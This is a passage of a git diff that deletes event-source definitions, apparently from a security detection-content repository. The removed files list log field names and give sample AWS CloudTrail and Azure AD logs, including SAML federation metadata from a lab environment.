/><DigestValue>ncp+pf0e75KdoRTy1PQeu74OKXjcVNM+bnT7Ns6cwQI=</DigestValue></Reference></SignedInfo><SignatureValue>J9PRCq201gGMzMtt4Ye+gsM7xOgrNvDg/usqIMvsyUy2r/MeTBz5FKCK+Okjwm49vyTWUoUioYGiwm/TD2Knv59g1zy+/OjZcmBJgDrCmksFJdkwG/fDlOZQNGuj2qh1CEKL5n6Ipy2z1dQ9XUmhhndtXNnjdZ0fJ9QWufWoxveSCLHcU7eUB9obwq96pbAp+6as0XreMNC/xPv5gDdHfKaIppsXtEwcZY7m1c25jDWqPUTQrtbVC0uryffg1Yu0JLTr646GMTzxulBSpQGRfNf5UT0bUiLtKngi++UHrngKdv3ovWwpVmY82JhG7rMDhkuWZu3LdEFvY3svNxGtsQ==</SignatureValue><KeyInfo><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></Signature><RoleDescriptor xsi:type=\"fed:SecurityTokenServiceType\" protocolSupportEnumeration=\"http://docs.oasis-open.org/wsfed/federation/200706\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:fed=\"http://docs.oasis-open.org/wsfed/federation/200706\"><KeyDescriptor use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></KeyDescriptor><KeyDescriptor use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIC8DCCAdigAwIBAgIQMN9XaFEOfIpMuOqq+1JFzzANBgkqhkiG9w0BAQsFADA0MTIwMAYDVQQDEylNaWNyb3NvZnQgQXp1cmUgRmVkZXJhdGVkIFNTTyBDZXJ0aWZpY2F0ZTAeFw0yMTAxMTcxODU2MTZaFw0yNDAxMTcyMTU2MTRaMDQxMjAwBgNVBAMTKU1pY3Jvc29mdCBBenVyZSBGZWRlcmF0ZWQgU1NPIENlcnRpZmljYXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2GO3vs2HPr+EXEVnWNRDOIjxS5tP2i9xq/399CAl/sWSbJkooGjcCKWf0DN1cGbbbrzL/V+Hor/htEFBpsbUsL8NbaE5pZOnH3oWquiHFiMs1t3Dh4dSVViKyMgIx/i5j4qUW74fYHvgead3kTIV7oSIYHXPNSF6SGLR8qWgRSCLre5P80PnzQmFoI1MbfJbJWf4rWBRVylJaamRFi8X/9byGAQKNYtrjnxCPtdvqUG03EMvwrUCTOM49qnuUhHUCtrIk8MQ1/xzHePkWT3OXmfCi0ABDFAnb9GH763rLlrawVaZKMzmICQ/Rts3+NUm0urSbPlUq1+IfbCsRCwz/QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA+ZOJcY1oGsj/LLa0KLhlUolA7dojhwDtZFPRInLcyBQ6G2fkEZr7jdgY0vg8X86vFCw2JLIC5UmUrXsC1YGxD0kzdMAqr06uVOxGKD/QCRKfes3AYqv/axoJpSm1uZP2066816bYIpOMjcc5yQaEzFh6Y2d5Ovd+DJ/BLVmTFuKs9p9q5JCpOQQT73c0actHdXsjZeM0iHbuWtQOu6LHJuQRbl7BCdKblLvpnoF7DrAHLq1xArcSUEuXa590aga7Ld9P/6BrTQ26QdGGfmJlRiaWh5iu22lbI169NlFd+EmgXIFWK0Qu6i7zyNkGTTA2GOOG9Z/vNIGKRxmV4l7KN</X509Certificate></X509Data></KeyInfo></KeyDescriptor><fed:ClaimTypesOffered><auth:ClaimType Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Name</auth:DisplayName><auth:Description>The mutable display name of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Subject</auth:DisplayName><auth:Description>An immutable, globally unique, non-reusable identifier of the user that is unique to the application for which a token is issued.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Given Name</auth:DisplayName><auth:Description>First name of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Surname</auth:DisplayName><auth:Description>Last name of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/displayname\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Display Name</auth:DisplayName><auth:Description>Display name of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/nickname\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Nick Name</auth:DisplayName><auth:Description>Nick name of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/authenticationinstant\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Authentication Instant</auth:DisplayName><auth:Description>The time (UTC) when the user is authenticated to Windows Azure Active Directory.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/authenticationmethod\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Authentication Method</auth:DisplayName><auth:Description>The method that Windows Azure Active Directory uses to authenticate users.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/objectidentifier\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>ObjectIdentifier</auth:DisplayName><auth:Description>Primary identifier for the user in the directory. Immutable, globally unique, non-reusable.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/tenantid\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>TenantId</auth:DisplayName><auth:Description>Identifier for the user''s tenant.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/identityprovider\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>IdentityProvider</auth:DisplayName><auth:Description>Identity provider for the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Email</auth:DisplayName><auth:Description>Email address of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/groups\"
-  xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Groups</auth:DisplayName><auth:Description>Groups of the user.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/accesstoken\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>External Access Token</auth:DisplayName><auth:Description>Access token issued by external identity provider.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/expiration\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>External Access Token Expiration</auth:DisplayName><auth:Description>UTC expiration time of access token issued by external identity provider.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/identity/claims/openid2_id\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>External OpenID 2.0 Identifier</auth:DisplayName><auth:Description>OpenID 2.0 identifier issued by external identity provider.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/claims/groups.link\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>GroupsOverageClaim</auth:DisplayName><auth:Description>Issued when number of user''s group claims exceeds return limit.</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/role\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>Role Claim</auth:DisplayName><auth:Description>Roles that the user or Service Principal is attached to</auth:Description></auth:ClaimType><auth:ClaimType Uri=\"http://schemas.microsoft.com/ws/2008/06/identity/claims/wids\" xmlns:auth=\"http://docs.oasis-open.org/wsfed/authorization/200706\"><auth:DisplayName>RoleTemplate Id Claim</auth:DisplayName><auth:Description>Role template id of the Built-in Directory Roles that the user is a member of</auth:Description></auth:ClaimType></fed:ClaimTypesOffered><fed:SecurityTokenServiceEndpoint><wsa:EndpointReference xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:SecurityTokenServiceEndpoint><fed:PassiveRequestorEndpoint><wsa:EndpointReference xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:PassiveRequestorEndpoint></RoleDescriptor><RoleDescriptor xsi:type=\"fed:ApplicationServiceType\" protocolSupportEnumeration=\"http://docs.oasis-open.org/wsfed/federation/200706\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:fed=\"http://docs.oasis-open.org/wsfed/federation/200706\"><KeyDescriptor use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></KeyDescriptor><KeyDescriptor use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIC8DCCAdigAwIBAgIQMN9XaFEOfIpMuOqq+1JFzzANBgkqhkiG9w0BAQsFADA0MTIwMAYDVQQDEylNaWNyb3NvZnQgQXp1cmUgRmVkZXJhdGVkIFNTTyBDZXJ0aWZpY2F0ZTAeFw0yMTAxMTcxODU2MTZaFw0yNDAxMTcyMTU2MTRaMDQxMjAwBgNVBAMTKU1pY3Jvc29mdCBBenVyZSBGZWRlcmF0ZWQgU1NPIENlcnRpZmljYXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2GO3vs2HPr+EXEVnWNRDOIjxS5tP2i9xq/399CAl/sWSbJkooGjcCKWf0DN1cGbbbrzL/V+Hor/htEFBpsbUsL8NbaE5pZOnH3oWquiHFiMs1t3Dh4dSVViKyMgIx/i5j4qUW74fYHvgead3kTIV7oSIYHXPNSF6SGLR8qWgRSCLre5P80PnzQmFoI1MbfJbJWf4rWBRVylJaamRFi8X/9byGAQKNYtrjnxCPtdvqUG03EMvwrUCTOM49qnuUhHUCtrIk8MQ1/xzHePkWT3OXmfCi0ABDFAnb9GH763rLlrawVaZKMzmICQ/Rts3+NUm0urSbPlUq1+IfbCsRCwz/QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA+ZOJcY1oGsj/LLa0KLhlUolA7dojhwDtZFPRInLcyBQ6G2fkEZr7jdgY0vg8X86vFCw2JLIC5UmUrXsC1YGxD0kzdMAqr06uVOxGKD/QCRKfes3AYqv/axoJpSm1uZP2066816bYIpOMjcc5yQaEzFh6Y2d5Ovd+DJ/BLVmTFuKs9p9q5JCpOQQT73c0actHdXsjZeM0iHbuWtQOu6LHJuQRbl7BCdKblLvpnoF7DrAHLq1xArcSUEuXa590aga7Ld9P/6BrTQ26QdGGfmJlRiaWh5iu22lbI169NlFd+EmgXIFWK0Qu6i7zyNkGTTA2GOOG9Z/vNIGKRxmV4l7KN</X509Certificate></X509Data></KeyInfo></KeyDescriptor><fed:TargetScopes><wsa:EndpointReference xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/</wsa:Address></wsa:EndpointReference></fed:TargetScopes><fed:ApplicationServiceEndpoint><wsa:EndpointReference xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:ApplicationServiceEndpoint><fed:PassiveRequestorEndpoint><wsa:EndpointReference xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:PassiveRequestorEndpoint></RoleDescriptor><IDPSSODescriptor protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\"><KeyDescriptor use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></KeyDescriptor><KeyDescriptor use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIC8DCCAdigAwIBAgIQMN9XaFEOfIpMuOqq+1JFzzANBgkqhkiG9w0BAQsFADA0MTIwMAYDVQQDEylNaWNyb3NvZnQgQXp1cmUgRmVkZXJhdGVkIFNTTyBDZXJ0aWZpY2F0ZTAeFw0yMTAxMTcxODU2MTZaFw0yNDAxMTcyMTU2MTRaMDQxMjAwBgNVBAMTKU1pY3Jvc29mdCBBenVyZSBGZWRlcmF0ZWQgU1NPIENlcnRpZmljYXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2GO3vs2HPr+EXEVnWNRDOIjxS5tP2i9xq/399CAl/sWSbJkooGjcCKWf0DN1cGbbbrzL/V+Hor/htEFBpsbUsL8NbaE5pZOnH3oWquiHFiMs1t3Dh4dSVViKyMgIx/i5j4qUW74fYHvgead3kTIV7oSIYHXPNSF6SGLR8qWgRSCLre5P80PnzQmFoI1MbfJbJWf4rWBRVylJaamRFi8X/9byGAQKNYtrjnxCPtdvqUG03EMvwrUCTOM49qnuUhHUCtrIk8MQ1/xzHePkWT3OXmfCi0ABDFAnb9GH763rLlrawVaZKMzmICQ/Rts3+NUm0urSbPlUq1+IfbCsRCwz/QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA+ZOJcY1oGsj/LLa0KLhlUolA7dojhwDtZFPRInLcyBQ6G2fkEZr7jdgY0vg8X86vFCw2JLIC5UmUrXsC1YGxD0kzdMAqr06uVOxGKD/QCRKfes3AYqv/axoJpSm1uZP2066816bYIpOMjcc5yQaEzFh6Y2d5Ovd+DJ/BLVmTFuKs9p9q5JCpOQQT73c0actHdXsjZeM0iHbuWtQOu6LHJuQRbl7BCdKblLvpnoF7DrAHLq1xArcSUEuXa590aga7Ld9P/6BrTQ26QdGGfmJlRiaWh5iu22lbI169NlFd+EmgXIFWK0Qu6i7zyNkGTTA2GOOG9Z/vNIGKRxmV4l7KN</X509Certificate></X509Data></KeyInfo></KeyDescriptor><SingleLogoutService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/saml2\" /><SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/saml2\" /><SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST\" Location=\"https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/saml2\" /></IDPSSODescriptor></EntityDescriptor>", "sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "responseElements": {"sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"}, "requestID": "83d621ad-5b33-4ff0-acf4-0043cb432844", "eventID": "51b6d859-0cc4-4591-ba76-3494f3f43832", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml
deleted file mode 100644
index a4ad73333a..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: AWS CloudTrail UpdateTrail
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.includeGlobalServiceEvents
-- requestParameters.isMultiRegionTrail
-- requestParameters.name
-- responseElements.includeGlobalServiceEvents
-- responseElements.isMultiRegionTrail
-- responseElements.isOrganizationTrail
-- responseElements.logFileValidationEnabled
-- responseElements.name
-- responseElements.s3BucketName
-- responseElements.trailARN
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:42:26Z", "eventSource": "cloudtrail.amazonaws.com", "eventName": "UpdateTrail", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/cloudtrail.update-trail", "requestParameters": {"name": "Regulatory", "includeGlobalServiceEvents": true, "isMultiRegionTrail": true}, "responseElements": {"name": "Regulatory", "s3BucketName": "s3-for-cloudtrail-logs111", "includeGlobalServiceEvents": true, "isMultiRegionTrail": true, "trailARN": "arn:aws:cloudtrail:us-west-2:111111111111:trail/Regulatory", "logFileValidationEnabled": false, "isOrganizationTrail": false}, "requestID": "0da61466-5bba-43f9-b7e1-27437de120b2", "eventID": "ce02af60-f29e-4bc2-8b29-31c12f408fed", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml
deleted file mode 100644
index bd34e901bc..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_app_role_assignment_to_service_principal.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Azure Active Directory Add app role assignment to service principal
-fields:
-- _time
-- Level
-- additional_details
-- additional_details_name
-- additional_details_value
-- category
-- command
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_type
-- durationMs
-- dvc
-- eventtype
-- host
-- id
-- identity
-- index
-- linecount
-- object_attrs
-- object_id
-- operationName
-- operationVersion
-- path_from_resourceId
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.app.appId
-- properties.initiatedBy.app.displayName
-- properties.initiatedBy.app.servicePrincipalId
-- properties.initiatedBy.app.servicePrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- result
-- resultSignature
-- result_id
-- signature
-- source
-- sourcetype
-- splunk_server
